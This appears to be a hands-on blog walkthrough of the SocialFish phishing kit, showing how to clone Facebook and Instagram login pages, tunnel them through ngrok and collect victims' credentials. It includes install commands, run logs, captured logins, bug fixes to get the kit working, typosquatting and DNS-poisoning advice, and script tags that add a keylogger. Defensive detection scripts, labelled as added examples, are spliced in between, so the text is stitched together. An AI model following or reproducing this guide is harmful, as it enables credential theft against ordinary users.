SocialFish Phishing Examples v2 & v3 [FB, Instagram, Custom]


SocialFish can be a bit difficult to locate if you’re looking for a specific version or if you’re a newbie. Apparently there are a number of forks, as well as a transition of some sort (moving, merging or converting SocialFish to HiddenEye).

Compared to Evilginx, for instance, SocialFish is inferior, but given its ease of use, its “popularity” is perhaps understandable. Nonetheless, we’re going to quickly go through SocialFish usage (out of the box).

SocialFish v2.0 SharkNet

We’re going to use an old version of SocialFish – SharkNet v2 (UndeadSec). There are probably other forks floating around, some supporting more options than others, but they’re basically all the same.

                      '
                     '   '  UNDEADSEC | t.me/UndeadSec
                    '       '  youtube.com/c/UndeadSec - BRAZIL
              .  '  .        '                        '
          '             '      '                   '   '
   ███████ ████████ ███████ ██ ███████ ██       ███████ ██ ███████ ██   ██ 
   ██      ██    ██ ██      ██ ██   ██ ██       ██      ██ ██      ██   ██ 
   ███████ ██    ██ ██      ██ ███████ ██       █████   ██ ███████ ███████ 
        ██ ██    ██ ██      ██ ██   ██ ██       ██      ██      ██ ██   ██ 
   ███████ ████████ ███████ ██ ██   ██ ███████  ██      ██ ███████ ██   ██ 
       .    '   '….'               ..'.      ' .
          '  .                     .     '          '     '  v2.0sharkNet 
                '  .  .  .  .  . '.    .'              '  .
                    '         '    '. '      Twitter: https://twitter.com/A1S0N_
                      '       '      '             
                        ' .  '
 [!] Do you agree to use this tool for educational purposes only? [y/N] > 

On start there are a couple of options: [S]ocial Media & [O]thers

Social Media:

  • Facebook
  • Google
  • Instagram
  • Github
  • FbRobotCaptcha
  • VK
  • LinkedIn
  • Snapchat
  • Twitter

Others:

  • StackOverflow
  • WordPress
  • Steam

They all work the same: select the redirect URL and you’re ready. Plug & Play. SocialFish sets things up, and NGrok tunnels the requests and exposes your server to the public internet. Easy.

SocialFish v2.0 vs Facebook

Run it:

python3 ./SocialFish.py
[!] Do you agree to use this tool for educational purposes only? [y/N] > y
[!] Do you want to receive credentials by email? [y/N] > n
  Select an option
   [S]ocial Media
   [O]thers
SF > s
 [1] LinkedIn
 [2] Twitter
 [3] Instagram
 [4] Snapchat
 [5] Github
 [6] Google
 [7] VK
 [8] Facebook
 [9] FbRobotCaptcha
 SF > 8
Insert a custom redirect url: > http//localhost/
     .-=-.     .-,     THIS IS NOT A JOKE!
  .'       "-.,' /  MISUSE OF THIS TOOL RESULTS 
 (          .  <          IN CRIME!
  =.____.=".\  AND THE RESPONSIBILITY IS
                          ONLY YOURS.

 [] facebook module loaded. Building site…  [~] Ready to Phishing  [] Ngrok URL: https://2608a973.ngrok.io
  [~] Your logs are being stored in: Logs/facebook-200130.txt
  [^] Press Ctrl+C or VolDown+C(android) to quit
  [*] Waiting for credentials… 

And we’re running. If we now open that link (https://2608a973.ngrok.io), we see a FB login page.

[Figure: SocialFish v2.0 vs Facebook – Login Page]

Of course, this is an old version and probably not up to date, so files are missing and the frontend is messed up. You could probably update that page manually or create a new page of your own (./base/WebPages/facebook/).

 drwxrwxr-x  2 unknown unknown   4096 јан 30 18:51 .
 drwxrwxr-x 14 unknown unknown   4096 нов  8  2018 ..
 -rw-rw-r--  1 unknown unknown 536440 нов  8  2018 index.html
 -rw-rw-r--  1 unknown unknown    989 нов  8  2018 login.php
 -rw-rw-r--  1 unknown unknown   9588 нов  8  2018 mobile.html
 -rw-rw-r--  1 unknown unknown     92 нов  8  2018 protect.html

If we ignore the frontend issue for now and continue by entering the credentials (cyberpunk/theone), the server side (output & log) ends up with:

[*] Credentials found:
   : cyberpunk
   : theone
   : 38.133.55.238 
  : Toronto
   : Canada

The user is then redirected to the previously set http//localhost/. Localhost was set just as an example; you should probably set the default login of a service. You’re most likely getting the picture by now. SocialFish basically hides behind the “failed” user login attempt, redirecting the user to a real login page right away. The unsuspecting user would most likely think they simply made a mistake typing the password, unknowingly giving their credentials to an attacker.
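For defenders, the behaviour described above leaves a recognisable trace in web proxy logs: a credential POST to an unrelated host that is answered with a redirect to the genuine login page. The following is an added example (not part of the original post or of SocialFish) that flags that pattern; the JSON log format, field names, sample records and brand list are assumptions, and it assumes the redirect is recorded as an HTTP 3xx response with a Location header.

```python
import json
from urllib.parse import urlsplit

# Assumption: domains whose login pages the organisation wants to protect.
BRAND_DOMAINS = {"facebook.com", "instagram.com"}

# Constructed proxy records, one JSON object per line (not real traffic).
SAMPLE_LOG = """\
{"ts": "18:51:02", "user": "alice", "method": "GET", "url": "https://2608a973.ngrok.io/", "status": 200, "location": ""}
{"ts": "18:51:40", "user": "alice", "method": "POST", "url": "https://2608a973.ngrok.io/login.php", "status": 302, "location": "https://www.facebook.com/login"}
{"ts": "18:52:10", "user": "bob", "method": "POST", "url": "https://www.facebook.com/login", "status": 302, "location": "https://www.facebook.com/"}
{"ts": "18:53:00", "user": "carol", "method": "POST", "url": "https://intranet.example/search", "status": 302, "location": "https://intranet.example/results"}
"""


def brand_of(host):
    """Return the protected domain that `host` belongs to, or None."""
    host = (host or "").lower().rstrip(".")
    for domain in BRAND_DOMAINS:
        if host == domain or host.endswith("." + domain):
            return domain
    return None


def find_credential_bounces(log_text):
    """Flag POSTs to a non-brand host that are answered with a redirect to a brand."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        if rec["method"] != "POST" or not 300 <= rec["status"] < 400:
            continue
        src = urlsplit(rec["url"]).hostname
        dst = urlsplit(rec.get("location") or "").hostname
        brand = brand_of(dst)
        # Genuine logins redirect within the brand's own domain; the pattern
        # described above posts elsewhere and then lands on the real site.
        if brand and brand_of(src) != brand:
            hits.append((rec["ts"], rec["user"], src, brand))
    return hits


if __name__ == "__main__":
    for hit in find_credential_bounces(SAMPLE_LOG):
        print("possible credential capture:", hit)
```

Hits are leads for triage rather than verdicts: each one names a user whose password should be treated as exposed until shown otherwise.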

OK, a domain like https://2608a973.ngrok.io will most likely look suspicious and be noticed by users, but add typosquatting to the mix (misspelling, different charset, top-level domain, etc.), or ARP table alteration or DNS poisoning, and the chance of success is even greater. Consider the difference between wikipedia.org and wikiepdia.org, or google and g00gle. How often do you check the URL?
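The look-alike domains mentioned above can be caught mechanically. This added example (not from the original post) checks a domain against a list of protected domains for the three tricks named in the text: misspelling, different charset and different top-level domain. The protected list, the small confusables table and the one-edit threshold are assumptions, and input is expected as a bare name.tld in Unicode form.

```python
import unicodedata

# Assumption: the registrable domains the organisation wants to protect.
PROTECTED = ["wikipedia.org", "google.com"]

# Small illustrative look-alike table: digits and a few Cyrillic letters.
CONFUSABLES = str.maketrans({
    "0": "o", "1": "l", "3": "e", "5": "s",
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
})


def skeleton(label):
    """Fold a label: lowercase, strip accents, map look-alike characters."""
    folded = unicodedata.normalize("NFKD", label.lower())
    folded = "".join(ch for ch in folded if not unicodedata.combining(ch))
    return folded.translate(CONFUSABLES)


def osa_distance(a, b):
    """Edit distance that counts an adjacent transposition as one edit."""
    prev2, prev = [], list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            best = min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb))
            if i > 1 and j > 1 and ca == b[j - 2] and a[i - 2] == cb:
                best = min(best, prev2[j - 2] + 1)
            cur.append(best)
        prev2, prev = prev, cur
    return prev[-1]


def classify(domain):
    """Return (protected domain, reason) if `domain` imitates one, else None."""
    name, _, tld = domain.lower().rstrip(".").partition(".")
    if f"{name}.{tld}" in PROTECTED:
        return None  # the genuine domain itself
    skel = skeleton(name)
    for target in PROTECTED:
        t_name = target.partition(".")[0]
        if name == t_name:
            return target, "different top-level domain"
        if skel == t_name:
            return target, "look-alike characters"
        if osa_distance(skel, t_name) == 1:
            return target, "one-edit misspelling"
    return None
```

Run over newly observed domains from DNS or mail-gateway logs, this turns the "how often do you check the URL" question into a check that does not depend on the user.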

SocialFish v2.0 vs Instagram

Out of the box, Instagram looks better: outdated but complete.

[Figure: SocialFish v2.0 vs Instagram – out of the box (2018)]

Same behaviour: enter the credentials and the server catches them on the other side, redirecting you to the pre-defined URL.

With NGrok (SocialFish + NGrok), mind your steps. There might be a situation in which ngrok is left running in the background. You need to restart the service or register in order to use it, or the service ends up timing out.

[Figure: SocialFish v2.0 vs Instagram – Ngrok Tunnel Expired]

SocialFish v3.0 Neptune

Apparently there are different variants of the same SocialFish version supporting different things. Yes, crazy s***. Everyone has their own ideas on how this should work. For instance, An0nUD4Y’s v3 still runs in the terminal, while UndeadSec’s uses a GUI by default.

SocialFish v3.0 Neptune [An0nUD4Y]

Running An0nUD4Y’s SocialFish version led me to many problems, like not being able to run Serveo or the default port 1111 not working for some reason.

[Figure: SocialFish v3.0 Neptune [An0nUD4Y] – Client Failed to establish a connection to the local address – port 1111]

It might be due to our testing system, but nonetheless, someone might encounter a similar issue. Try editing the default/hardcoded port to something else (e.g. 8080). Another issue is that the “runServer” function is not reached, so swap the order of the lines (quick fix):

server()
multiprocessing.Process(target=runServer).start()

to

multiprocessing.Process(target=runServer).start()
server()

NGrok panel is available on: http://localhost:4040/inspect/http

Looking at the files:

 drwxrwxr-x 2 unknown unknown 4,0K феб  4 14:27 index_files
-rw-rw-r-- 1 unknown unknown 131K феб 3 22:58 index.html
-rw-rw-r-- 1 unknown unknown 711 феб 4 14:39 ip.php
-rw-rw-r-- 1 unknown unknown 180 феб 4 14:42 ip.txt
-rw-rw-r-- 1 unknown unknown 379 феб 4 14:39 KeyloggerData.txt
-rw-rw-r-- 1 unknown unknown 292 феб 4 14:39 keylogger.js
-rw-rw-r-- 1 unknown unknown 172 феб 4 14:39 keylogger.php
-rw-rw-r-- 1 unknown unknown 192 феб 4 14:39 login.php
-rw-rw-r-- 1 unknown unknown 27 феб 4 14:42 usernames.txt

A keylogger is present, but it’s not included everywhere. Looking at the code, it seems that only GitHub has it, so if you want to capture keys, you must include the script yourself.

<script src="keylogger.js"></script>
<script src="keylogger.php"></script>
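From an incident-response angle, the file names in the two directory listings above serve as a fingerprint for finding this kind of page on a compromised or abused web host. The following added example (not part of the original post or of the tool) walks a web root and scores each directory against those names; the weights, the threshold and the choice of which files count as capture files are assumptions.

```python
import os

# File names come from the two directory listings on this page. The weights
# and threshold are assumptions: common names score low, capture files high.
KIT_FILES = {
    "login.php": 1, "mobile.html": 1, "protect.html": 2, "ip.php": 2,
    "keylogger.js": 3, "keylogger.php": 3,
    "ip.txt": 2, "usernames.txt": 3, "keyloggerdata.txt": 4,
}
# Assumption: these names hold captured data, so their size matters for triage.
CAPTURE_FILES = {"ip.txt", "usernames.txt", "keyloggerdata.txt"}
THRESHOLD = 4


def score_directory(dirpath, filenames):
    """Score one directory against the kit layout; return a finding or None."""
    matched = sorted(f for f in filenames if f.lower() in KIT_FILES)
    score = sum(KIT_FILES[f.lower()] for f in matched)
    if score < THRESHOLD:
        return None
    captured = sum(os.path.getsize(os.path.join(dirpath, f))
                   for f in matched if f.lower() in CAPTURE_FILES)
    return {"dir": dirpath, "score": score, "matched": matched,
            "captured_bytes": captured}


def scan_webroot(root):
    """Walk `root` and list directories resembling the kit, highest score first."""
    findings = []
    for dirpath, _subdirs, filenames in os.walk(root):
        finding = score_directory(dirpath, filenames)
        if finding:
            findings.append(finding)
    return sorted(findings, key=lambda f: f["score"], reverse=True)


if __name__ == "__main__":
    import sys
    for f in scan_webroot(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f'{f["score"]:>3}  {f["dir"]}  captured={f["captured_bytes"]}B  {f["matched"]}')
```

A non-zero `captured_bytes` value means the capture files are not empty, which is the cue to preserve them as evidence and start identifying affected accounts.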

This version of Neptune definitely includes a number of options (transitioned to HiddenEye):

[1] Facebook
    Operation mode:
        [1] Standard Page Phishing
        [2] Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)
        [3] Facebook Phishing- Fake Security issue(security_mode) 
        [4] Facebook Phising-Messenger Credentials(messenger_mode)

[2] Google
    Operation mode: 
        [1] Standard Page Phishing
        [2] Advanced Phishing(poll_mode/login_with)
        [3] New Google Web

[3] LinkedIn
[4] GitHub
[5] StackOverflow
[6] WordPress
[7] Twitter

[8] Instagram
    Operation mode:  
        [1] Standard Instagram Web Page Phishing
        [2] Instagram Autoliker Phising (After submit redirects to original autoliker)

[9] Snapchat
[10] Yahoo
[11] Twitch
[12] Microsoft
[13] Steam

[14] VK
    Operation mode:  
        [1] Standard VK Web Page Phishing
        [2] Advanced Phishing(poll_mode/login_with)

[15] iCloud 

* Modules 3, 4, 5, 6, 7, 9, 10, 11, 12 and 13 are being directly loaded without operation mode (Traditional/Standard logins)

SocialFish v3.0 vs Facebook [An0nUD4Y]

Well, selection => Facebook => Standard Web Page Phishing

[Figure: SocialFish v3 Facebook Phishing – Error rendering]

It doesn’t look great, that’s for sure, but we’re not going to go into details here; we’re testing things as is, out of the box. This definitely looks similar to SocialFish v2 (SharkNet), but the main logo says it’s v3.0. Moreover, the Instagram result below is the same.

SocialFish v3.0 vs Instagram[An0nUD4Y]

It clearly states 2018, so some segments of An0nUD4Y were updated, but others were not.

[Figure: SocialFish v3 Instagram Phishing – Old layout]

SocialFish v3.0 Neptune [UndeadSec]

We used UndeadSec’s SocialFish (Neptune v3). The install process is straightforward; you can find it in the repository info or wiki. Main prerequisites: > python3.6, pip3

$ sudo apt-get install python3 python3-pip python3-dev -y
$ git clone https://github.com/UndeadSec/SocialFish.git
$ cd SocialFish
$ python3 -m pip install -r requirements.txt
$ python3 ./SocialFish.py cyberpunk theone

[Figure: UndeadSec – SocialFish v3.0 Neptune]

Neptune offers a web interface on http://0.0.0.0:5000/. Initially you’ll be presented with an empty page:

[Figure: SocialFish v3 Neptune Web Interface]

Opening http://0.0.0.0:5000/neptune, you’ll end up with a login (the one you used on SocialFish start).

[Figure: SocialFish v3 Neptune Web Interface (/neptune)]

Log in and you’ll end up with a “dashboard”:

[Figure: SocialFish v3 Neptune Web Interface (/creds, dashboard upon login)]

One thing that puzzles us is the “SECRET KEY” option. A quick look at the codebase and it seems like it’s not used anywhere:

$ grep -i "APP_SECRET" ./* -R
./core/config.py:APP_SECRET_KEY = ''
./SocialFish.py:app.secret_key = APP_SECRET_KEY

Probably some future functionality. Apparently, there’s no KeyLogger option here.

SocialFish v3.0 (Neptune) vs Facebook

Similar to the previous version, fill in the fields in the top right corner (clone/redirection): add the link you want to clone and the address to which the redirection should take a user:

Clone: https://www.instagram.com/accounts/login/?source=auth_switcher
Redirect: https://www.instagram.com/accounts/login/?source=auth_switcher

[Figure: SocialFish v3 dashboard Fields]

Hit that small power sign to start it up (a pop-up with a “success” message should appear). The “Method not allowed” or “CORS” issues might cause some problems. Importantly, if you try to use “facebook.com” you might end up with an incomplete page (missing the labels, text, etc.).

[Figure: SocialFish v3 Facebook Phishing – Bad rendering]

Instead, try a direct English URL or “en-gb.facebook.com”:

[Figure: SocialFish v3 Facebook Phishing – Correct rendering]

Behaviour is the same: the user enters the credentials (SocialFish picks them up) and gets redirected to the previously specified page. The dashboard tracks the clicks (visits), how many visitors didn’t take the bait, captured credentials and attacks launched.

[Figure: SocialFish v3 Dashboard]

Clicking on the view shows you the details of what’s captured:

{'jazoest': '2632', 'lsd': 'AVqCEN6a', 'email': 'cyberpunk', 'pass': 'theone', 'timezone': '-60', 'lgndim': 'eyJ3IjoxOTIwLCJoIjoxMDgwCCJhdyI6MTDyMCwAYWgiOjEwODAsImMiOjI1fQ==', 'lgnrnd': '065021_ZrKc', 'lgnjs': '1580568629', 'ab_test_data': 'KAVA/fffqAVAVVKAAKAKAVAAKAAAAKKAAAAAAAAAAGs//ZlSAAGRAAH', 'locale': 'en_GB', 'next': 'https://en-gb.facebook.com/', 'login_source': 'login_bluebar', 'guid': 'f47db913b42a344', 'prefill_contact_point': '', 'prefill_source': '', 'prefill_type': '', 'skstamp': 'eyJoYXNoIjoiZmRkNAY5NjdkOGM1ODQzYzhmMmM2NzczZTVhMWFjMTIiLCJoYXNoMiI6ImY4NzBiMzRhYzAyZmFmYmZjMWU5YjIyNWI3ZGQ3YWI4Iiwicz91bmRzIjo1LCJzZWVkIjsiNjQ0ZmM1MzNmYTM2Y2NyOGQ0MTlkZDNjMGI2NTBhMDEiLCJzZWVkMiI6IjRjMzEaMzIxYWM1YjA2Y2RhZDdiN2ZjMTJiNDg0M2VkIiwidTltZV91YWtlbiI6OTIxNCwic3VyZnFjZSI6ImxvZ2luIn0='}

SocialFish v3.0 (Neptune) vs Instagram

Unfortunately, trying this on the Instagram login ended in failure. CORS or bad clone, not sure.

[Figure: SocialFish v3 Instagram Phishing – Error]

Custom

Using SocialFish seems to have certain prerequisites, like the login page/form having “email” & “password” fields. We didn’t explore additional options, but if you have a “login name” (not an email) & “password” on a custom/random login page you’re trying to phish, you’ll need to adjust SocialFish.py. Again, we didn’t explore additional options & ways to circumvent this. On our test page:

And the captured result:

{'email': 'cyberpunk', 'password': 'theone', 'login': ''}

The button had “name=login”, so the field probably got picked up as well (with an empty value).

Conclusion

Well, that was an experience, trying to fix something that should work on its own, but you get used to things not working out. There’s no documentation when it comes to SocialFish (or not a detailed one at least), and although it’s maybe “intuitive” for some experienced users, for newbie users all this might be a complete unknown. We didn’t cover page/template update and/or custom page builds, but based on a cloning option in v3, that probably isn’t necessary.

Next, since this project moved to HiddenEye, we’re going to check that one as well.

FYI: SocialFish Mobile Controller: SocialFishMobile (UndeadSec)